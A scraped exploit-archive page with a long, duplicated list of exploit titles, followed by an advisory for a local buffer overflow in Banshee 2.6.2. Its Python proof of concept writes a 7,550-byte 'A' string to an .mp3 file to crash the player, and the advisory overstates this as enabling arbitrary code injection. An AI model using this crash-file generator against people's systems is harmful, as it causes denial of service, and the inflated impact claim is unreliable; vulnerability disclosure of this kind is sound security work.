0fe9b46f79
14 new exploits Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit (2) Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1) Linux Kernel <= 2.4.29-rc2 - uselib() Privilege Elevation Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1) Linux Kernel 2.4 - uselib() Privilege Elevation Exploit Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2) Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3) Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2) Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1) Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2) Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1) Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3) Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1) Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2) Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2) Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3) Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3) Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability (4) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation Linux Kernel <= 2.6.37 - Local Kernel Denial of Service Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1) Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1) Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1) Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service Vulnerability Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1) Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' Vulnerability (1) Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2) Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1) Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2) Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root Vulnerability (1) Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1) Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2) Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept (1) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with 'CONFIG_X86_X32' Exploit (2) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit (3) Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3) Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3) Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation Vulnerability Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2) Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1) Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2) DarkComet Server Remote File Download Exploit (msf) Banshee 2.6.2 - .mp3 Crash PoC IonizeCMS 1.0.8 - (Add Admin) CSRF Yona CMS - (Add Admin) CSRF Joomla Publisher Pro (com_publisher) Component - SQL Injection Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074) Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074) Linux - ecryptfs and /proc/$pid/environ Privilege Escalation Windows - Custom Font Disable Policy Bypass Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063) SAP NetWeaver AS JAVA 7.1 - 7.5 - ctcprotocol Servlet XXE SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities YetiForce CRM < 3.1 - Persistent XSS
172 lines
No EOL
4.7 KiB
Python
Executable file
172 lines
No EOL
4.7 KiB
Python
Executable file
'''
|
|
Title:
|
|
====
|
|
|
|
Banshee 2.6.2 Local Buffer Overflow Vulnerability
|
|
|
|
|
|
Credit:
|
|
======
|
|
Name: Ilca Lucian
|
|
Contact: lucianfilca@gmail.com
|
|
lucian@pwnthecode.org
|
|
|
|
|
|
CVE:
|
|
=====
|
|
|
|
Unknown (for moment)
|
|
|
|
|
|
Product:
|
|
=======
|
|
|
|
|
|
Play your music and videos. Keep up with your podcasts and Internet radio.
|
|
Discover new music and podcasts. Keep your portable device loaded with good
|
|
stuff.
|
|
|
|
Simple enough to enjoy. Powerful enough to thrill. Open source through and
|
|
through.
|
|
|
|
Product link: http://www.banshee.fm
|
|
|
|
|
|
Abstract:
|
|
=======
|
|
|
|
Lucian I. discovered a Local Buffer Overflow vulnerability in Banshee
|
|
Player 2.6.2 .
|
|
|
|
|
|
Affected Version:
|
|
=============
|
|
|
|
Ver 2.6.2
|
|
|
|
|
|
Date:
|
|
============
|
|
19.06.2016
|
|
|
|
|
|
Exploitation-Technique:
|
|
===================
|
|
|
|
Local
|
|
|
|
|
|
Severity Rating:
|
|
===================
|
|
|
|
4.4
|
|
|
|
|
|
Details:
|
|
=======
|
|
Vulnerability Description : Banshee Media Player is vulnerable to buffer
|
|
overflow vulnerability.The software performs operations on a memory buffer,
|
|
but it can read from or write to a memory location that is outside of the
|
|
intended boundary of the buffer.Certain languages allow direct addressing
|
|
of memory locations and do not automatically ensure that these locations
|
|
are valid for the memory buffer that is being referenced. This can cause
|
|
read or write operations to be performed on memory locations that may be
|
|
associated with other variables, data structures, or internal program data.
|
|
|
|
Impact : Banshee 2.6.2 is prone to a local buffer-overflow vulnerability
|
|
because the application fails to perform adequate boundary checks on
|
|
user-supplied input. Specifically, this issue occurs when opening a '.mp3'
|
|
playlist file that contains excessive data.
|
|
|
|
Attackers may leverage this issue to execute remote buffer overflow or
|
|
inject arbitrary code in the context of the application. Failed attacks
|
|
will cause denial-of-service conditions.
|
|
|
|
Path Log:
|
|
|
|
type=PATH msg=audit(1466452858.351:14): item=0 name="/usr/bin/banshee"
|
|
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
|
nametype=NORMAL
|
|
type=PROCTITLE msg=audit(1466452858.351:14):
|
|
proctitle=64656275676673002F7573722F62696E2F62616E73686565
|
|
type=SYSCALL msg=audit(1466452858.351:15): arch=c000003e syscall=2
|
|
success=yes exit=3 a0=7fffd6ed664f a1=80000 a2=ffffffff a3=ca items=1
|
|
ppid=16021 pid=9458 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0
|
|
egid=0 sgid=0 fsgid=0 tty=pts0 ses=4294967295 comm="debugfs"
|
|
exe="/sbin/debugfs" key=(null)
|
|
type=CWD msg=audit(1466452858.351:15): cwd="/root/Downloads"
|
|
type=PATH msg=audit(1466452858.351:15): item=0 name="/usr/bin/banshee"
|
|
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
|
nametype=NORMAL
|
|
type=PROCTITLE msg=audit(1466452858.351:15):
|
|
proctitle=64656275676673002F7573722F62696E2F62616E73686565
|
|
type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59
|
|
success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1
|
|
pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0
|
|
tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null)
|
|
type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env"
|
|
a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued"
|
|
type=CWD msg=audit(1466453064.143:16): cwd="/root"
|
|
type=PATH msg=audit(1466453064.143:16): item=0 name="/usr/bin/banshee"
|
|
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
|
nametype=NORMAL
|
|
type=PATH msg=audit(1466453064.143:16): item=1 name="/usr/bin/env"
|
|
inode=17567018 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
|
nametype=NORMAL
|
|
type=PATH msg=audit(1466453064.143:16): item=2
|
|
name="/lib64/ld-linux-x86-64.so.2" inode=9047695 dev=08:01 mode=0100755
|
|
ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
|
|
type=PROCTITLE msg=audit(1466453064.143:16):
|
|
proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564
|
|
type=SYSCALL msg=audit(1466453064.159:17): arch=c000003e syscall=2
|
|
success=yes exit=3 a0=16b4268 a1=0 a2=0 a3=8 items=1 ppid=1 pid=9559 auid=0
|
|
uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1
|
|
comm="bash" exe="/bin/bash" key=(null)
|
|
type=CWD msg=audit(1466453064.159:17): cwd="/root"
|
|
|
|
|
|
|
|
Error report image link :
|
|
|
|
https://postimg.org/image/x0x8raw2v/
|
|
|
|
|
|
Prerequisites:
|
|
======================
|
|
|
|
The attacker needs to entice victims to perform an action in order to
|
|
exploit this vulnerability.
|
|
|
|
|
|
Proof Of Concept:
|
|
================
|
|
|
|
|
|
POC Exploit code:
|
|
'''
|
|
|
|
#!/usr/bin/python
|
|
|
|
A = "\x41"
|
|
|
|
p0c = 'A' * 7550
|
|
|
|
generate = "dos.mp3"
|
|
file = open(generate , "w")
|
|
file.write(p0c)
|
|
file.close()
|
|
|
|
|
|
'''
|
|
Risk:
|
|
=====
|
|
|
|
The security risk of the Local Buffer Overflow Vulnerability is estimated
|
|
as moderate.
|
|
|
|
|
|
Credits:
|
|
=======
|
|
|
|
Lucian Ilca
|
|
''' |